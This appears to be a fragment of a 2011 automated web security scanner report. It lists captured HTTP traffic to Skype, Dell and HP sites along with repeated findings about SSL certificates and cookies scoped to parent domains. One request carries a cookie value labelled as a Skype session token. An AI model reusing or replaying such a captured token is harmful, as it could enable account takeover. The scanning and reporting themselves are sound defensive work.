<a href="/tutorials/viewHowTo/p/courseId/40439/Microsoft_Excel_2010.htm?courseSessionId=368863&campusId=11263" title="This animated demonstration introduces you to the new Microsoft Excel 2010 interface and teaches you some basic skills.">Microsoft.. Excel 2010: take a tour of the interface and learn basic skills</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/26569/Microsoft_PowerPoint.htm?courseSessionId=173979&campusId=11263" title="You can create master slides in PowerPoint to add or change design elements and formatting in presentations. Learn how in this demonstration.">Microsoft.. PowerPoint 2007: create a new slide master</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/26589/Microsoft_PowerPoint.htm?courseSessionId=173986&campusId=11263" title="In this demonstration you'll learn how to change options and customize the interface to find the toolbars and functions you need most.">Microsoft.. PowerPoint 2007: customize the PowerPoint interface</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/40443/Microsoft_PowerPoint.htm?courseSessionId=368867&campusId=11263" title="You can create master slides in PowerPoint 2010 to add or change design elements and formatting in presentations. Learn how in this demonstration.">Microsoft.. PowerPoint 2010: create a new slide master</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/39829/Microsoft_Windows_7_.htm?courseSessionId=324159&campusId=11263" title="In this demonstration, you will learn how to speed up your network and internet connections using Microsoft.. Windows.. 7 Professional. ">Microsoft.. Windows.. 7: speed up network and internet connections</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14762/Microsoft_Word_2007_.htm?courseSessionId=173980&campusId=11263" title="Microsoft Word 2007 offers new special features. Follow along with this demonstration to learn how to use a few of them.">Microsoft.. Word 2007: take a tour of special features</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11263" title="This animated demonstration shows you how to use the Ribbon, the new, tabbed navigation system in Microsoft Word 2007.">Microsoft.. Word 2007: take a tour of the Ribbon</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14764/Microsoft_Word_2007_use_the_Track_Changes_feature.htm?courseSessionId=174001&campusId=11263" title="This step-by-step demonstration shows you how to track revisions to documents in Microsoft Word 2007.">Microsoft.. Word 2007: use the Track Changes feature</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/40442/Microsoft_Word_2010_take_a_tour_of_the_Ribbon.htm?courseSessionId=368866&campusId=11263" title="This animated demonstration shows you how to use the Ribbon in Microsoft Word 2010.">Microsoft.. Word 2010: take a tour of the Ribbon</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14172/Microsoft_Windows_Vi.htm?courseSessionId=173987&campusId=11264" title="This animated demonstration shows you how to back up the registry in Windows Vista.">Microsoft.. Windows Vista advanced customization: back up the registry</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14173/Microsoft_Windows_Vi.htm?courseSessionId=173988&campusId=11264" title="This animated demonstration shows you how to increase bandwidth for network and internet connections in Windows Vista.">Microsoft.. Windows Vista advanced customization: increase bandwidth for network and internet connections</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11264" title="This animated demonstration shows you how to find files using basic Search in Windows Vista.">Microsoft.. Windows Vista: find files using basic Search</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/35913/Microsoft_Windows_Vi.htm?courseSessionId=173978&campusId=11264" title="The registry is the database of system settings for Windows Vista. In this demonstration you'll see how to find info in the registry.">Microsoft.. Windows Vista: find information in the registry</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14091/Microsoft_Windows_Vista_Sidebar_adding_gadgets.htm?courseSessionId=173999&campusId=11264" title="Make your desktop work for you by adding gadgets to the Windows Vista Sidebar.">Microsoft.. Windows Vista Sidebar: adding gadgets</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14761/Microsoft_Windows_Vista_use_Disk_Cleanup.htm?courseSessionId=173998&campusId=11264" title="You can use Disk Cleanup Wizard to save hard disk space by deleting files you might not need. Learn how in this step-by-step demonstration.">Microsoft.. Windows Vista: use Disk Cleanup</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11260" title="Learn how development of the right color scheme for your marketing collateral can take your business to the next level.">Color your business: develop a marketing color scheme</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11260" title="Learn how to organize email files and folder structure and use your program's search functionality to achieve better inbox management.">Mastering email: keep your inbox clutter-free</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/25989/Microsoft_OneNote_creating_and_using_notebooks.htm?courseSessionId=175487&campusId=11260" title="Find out how to use notebooks in Microsoft OneNote 2007 to organize your notes by topic, project, class or organization.">Microsoft.. OneNote: creating and using notebooks</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/25990/Microsoft_OneNote_getting_started.htm?courseSessionId=175488&campusId=11260" title="Learn about the basics of Microsoft OneNote 2007 and how it helps you organize and keep track of notes and other pieces of information. No papers or sticky notes required!">Microsoft.. OneNote: getting started</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/18329/Use_color_coding_to_prioritize_your_email.htm?courseSessionId=175489&campusId=11260" title="Learn how to transform an unorganized sea of email messages in your inbox into an actionable, prioritized list so you know what to read first.">Use color-coding to prioritize your email</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/18331/Use_Google_Desktop_t.htm?courseSessionId=175490&campusId=11260" title="Do you have tons of files on your hard disk or in email archives, and you can't find what you need? Let Google Desktop be your retriever.">Use Google Desktop to find and retrieve what you need</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/16608/HP_Backup_and_Recovery_Manager_restore_files.htm?courseSessionId=175481&campusId=10163" title="All HP business desktop and notebook computers have HP Backup and Recovery Manager. Learn how to use this application to restore files in this demonstration.">HP Backup and Recovery Manager: restore files</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/16609/HP_Backup_and_Recovery_Manager_schedule_backups.htm?courseSessionId=175482&campusId=10163" title="All HP business desktop and notebook computers have HP Backup and Recovery Manager. This demonstration shows you how to use this application to back up files.">HP Backup and Recovery Manager: schedule backups</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/32049/HP_ProtectTools_Secu.htm?courseSessionId=175483&campusId=10163" title="Get an overview of HP ProtectTools Security Manager and learn how to set up and use Smart Card (Java Card) functionality, step by step.">HP ProtectTools Security Manager: enable Smart Card security</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/32069/HP_ProtectTools_Secu.htm?courseSessionId=175484&campusId=10163" title="Learn how to configure BIOS settings using the HP ProtectTools Security Manager.">HP ProtectTools Security Manager: using BIOS Configuration</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/32089/HP_ProtectTools_Secu.htm?courseSessionId=175485&campusId=10163" title="Get an overview of HP ProtectTools Security Manager and learn how to set up and use SSO functionality, step by step.">HP ProtectTools Security Manager: using single sign-on</a> ...[SNIP]...
GET /intl/en-us/prices/premium HTTP/1.1 Host: www.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:38:15 GMT Server: Apache Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=Edge,chrome=1 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 54583
GET /intl/en-us/prices/premium/ HTTP/1.1 Host: www.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:38:17 GMT Server: Apache Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=Edge,chrome=1 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 54583
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0 Host: login.skype.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
var OAS_taxonomy = 'muid=21051315103139790868608'; var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A%2F%2Fwww.wallstreetoa ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/houlihan-lokey-exit-opps HTTP/1.1 Host: www.wallstreetoasis.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1 Host: 142.xg4ken.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 16:18:39 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:39 GMT; path=/; domain=.xg4ken.com Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/DellPartsFamily.aspx HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 76867 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/ Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:05 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell C ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/ShopAllBrands.aspx HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 165178 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:26 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:25 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop B ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/batteryconfig.aspx?c=us&cs=04&l=en&s=bsd HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 23838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Batter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/category.aspx?c=us&l=en&s=dhs&category_id=5914&cs=19 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 122314 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|dhs|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:18 GMT; path=/ Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=A4186752,A4186751,A4186750; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:19 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:19 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>TVs - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/category.aspx?category_id= HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:14 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Electr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 88780 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/ Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:30 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/memconfig.aspx HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 30746 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:58 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4&~ck=mn HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 34551 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:22 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Printe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sna/productdetail.aspx HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 149 Content-Type: text/html; charset=utf-8 Location: /sna/productnotfound.aspx? Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:44 GMT; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:44 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fsna%2fproductnotfound.aspx%3f">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_inkjets&~ck=mn&~ck=mn HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 53137 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:25 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:25 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop a ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/English/ct-p/English?profile.language=en HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0 Host: community.skype.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: h30434.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
